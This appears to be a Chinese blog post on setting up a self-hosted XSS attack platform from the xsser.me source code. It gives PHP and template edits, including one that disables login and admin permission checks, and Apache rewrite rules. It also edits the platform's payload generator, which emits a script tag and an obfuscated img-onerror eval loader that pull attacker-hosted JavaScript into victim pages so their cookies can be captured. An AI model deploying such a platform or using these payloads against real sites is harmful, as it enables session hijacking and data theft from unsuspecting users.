首页
登录 | 注册

xss平台搭建(使用xsser.me源码)


需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。

1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/

或者导入以后,再进入数据库执行语句修改域名为自己的。
  
UPDATE oc_module SET
code=REPLACE(code,'http://xsser.me','http://yourdomain/xss’)

2、修改themes\default\templates\register.html中的提交按钮的源码为:

行53
<input id="btnRegister" type="button" onclick="Register()" value="提交注册" />
修改为
<input id="btnRegister" type="submit" value="提交注册" />

3、邀请码的生成

(1)将文件source\user.php第10行和50行的权限控制注释掉
//if($user->userId<=0) ShowError('未登录或已超时',$url['login'],'重新登录');
//if($user->adminLevel<=0) ShowError('没有操作权限',URL_ROOT.'/index.php?do=user&act=invite');
然后访问/index.php?do=user&act=invite即可生成验证码
(2)注册个用户test,进入数据库,将该用户的adminLevel修改为1,然后去掉(1)中添加到注释;并在第15行case 'invite':处添加权限控制:
if($user->adminLevel<=0) ShowError('没有操作权限',URL_ROOT.'/index.php');
(3)或者开放普通注册权限,修改文件/config.php的第18行
$config['register']='invite';	//normal,正常;invite,只允许邀请注册;close,关闭注册功能

4、删除cookie

修改文件themes\default\templates\project_view.html中的Delete()和MultiDelete()函数,将其中post的URL修改为
'/xss/index.php?do=project&act=delcontent&r=',即根据实际的服务器路径,在前面添加'/xss'

5、参考http://zone.wooyun.org/content/4355修改文件source\class\user.class.php

行 74
$this->db->Execute("UPDATE ".$this->tbUser." SET loginTime='".time()."'");
修改为
$this->db->Execute("UPDATE ".$this->tbUser." SET loginTime='".time()."' where id={$row['id']}");

6、去掉xss URL中的time()动态值,缩短xss URL的长度(不知会不会有啥影响);

      去掉使用提示中的</textarea>'\">

文件source/project.php中的修改:

//$codeurl=URL_ROOT."/{$project[urlKey]}?".time();
$codeurl=URL_ROOT."/{$project[urlKey]}";

//$scriptShow1=StripStr("<textarea>'"<script src=".URL_ROOT."/{$project[urlKey]}?".time()."></script>");
$scriptShow1=StripStr("<script src=".URL_ROOT."/{$project[urlKey]}></script>");

//$code2='var b=document.createElement("script");b.src="'.URL_ROOT."/{$project[urlKey]}?".'"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
//$scriptShow2=StripStr("</textarea>'\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//>");
$code2='var b=document.createElement("script");b.src="'.URL_ROOT."/{$project[urlKey]}".'";(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
$scriptShow2=StripStr("<img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//>");


7、登录页面,回车登录;加载完页面后,自动将光标定位在user输入框

文件themes/default/templates/login.html的修改:

<!-- <input type="submit" value="登录" onclick="Login()"> --> 
<input type="submit" value="登录" onclick="Login()"> 

在body的最后添加:

<!-- 页面加载完成后,将光标定位到user输入框 -->
<script>document.getElementById('user').focus();</script>


8、修改提示页面跳转时间为500ms

文件themes/default/templates/notice.html:
行11
setTimeout("location.href='{$notice.turnto}'",3000);
修改为
setTimeout("location.href='{$notice.turnto}'",500);


10、创建项目页面,自动将光标置于项目名称处

themes/default/templates/project_create.html
行55,添加
<script>document.getElementById('title').focus();</script>


 11、rewrite规则

在web根目录下建立.htaccess伪静态文件(仅针对Apache) 

    RewriteEngine On 
  RewriteRule ^([0-9a-zA-Z]{6})$ /xss/index.php?do=code&urlKey=$1 [L] 
  RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$  /xss/index.php?do=do&auth=$1&domain=$3 [L] 
  RewriteRule ^register/(.*?)$ /xss/index.php?do=register&key=$1 [L] 
  RewriteRule ^register-validate/(.*?)$ /xss/index.php?do=register&act=validate&key=$1 [L] 


 


相关文章

  • 源码|详解分布式事务之 Seata-Client 原理及流程
    前言 在分布式系统中,分布式事务是一个必须要解决的问题,目前使用较多的是最终一致性方案.自年初阿里开源了Fescar(四月初更名为Seata)后,该项目受到了极大的关注,目前已接近 8000 Star.Seata 以高性能和零侵入的特性为目 ...
  • 简单的SSM-Shiro安全框架搭建
    首先需要导jar包! 配置你自己的web.xml CharacterEncodingFilter org.springframework.web.filter.CharacterEncodingFilter encoding utf-8 f ...
  • 阿里云POLARDB如何助力轻松筹打造5亿用户信赖的大病筹款平台?
    轻松筹首创了"大病救助"模式,帮助了众多病患在第一时间解決了医疗资金等问题,为了从源头解决了医疗资金问题.而在轻松筹这样全球5.5亿用户信赖的大病筹款平台的背后,是日益增长的各种数据.面对这样数据量所造成的巨大挑战,阿里 ...
  • 阿里新一代分布式任务调度平台Schedulerx2.0破土而出
    1. 产品简介 Schedulerx2.0是阿里中间件自研的基于Akka架构的新一代分布式任务调度平台,提供定时.任务编排.分布式跑批等功能.使用Schedulerx2.0,您可以在控制台配置管理您的定时任务,查询历史执行记录,查看运行日志 ...
  • Redis radix tree源码解析
    Redis实现了不定长压缩前缀的radix tree,用在集群模式下存储slot对应的的所有key信息.本文将详述在Redis中如何实现radix tree. 核心数据结构 raxNode是radix tree的核心数据结构,其结构体如下代 ...
  • 微软发布人工智能教育与学习共建社区
    步入2019,人工智能(Artificial Intelligence)的浪潮依然汹涌,各国对于AI人才的需求进一步加大:2月,美国总统特朗普签署行政命令,正式启动美国人工智能计划:加拿大正通过"全球技能战略签证"吸引国 ...

2020 jeepshoe.net webmaster#jeepshoe.net
13 q. 0.361 s.
京ICP备10005923号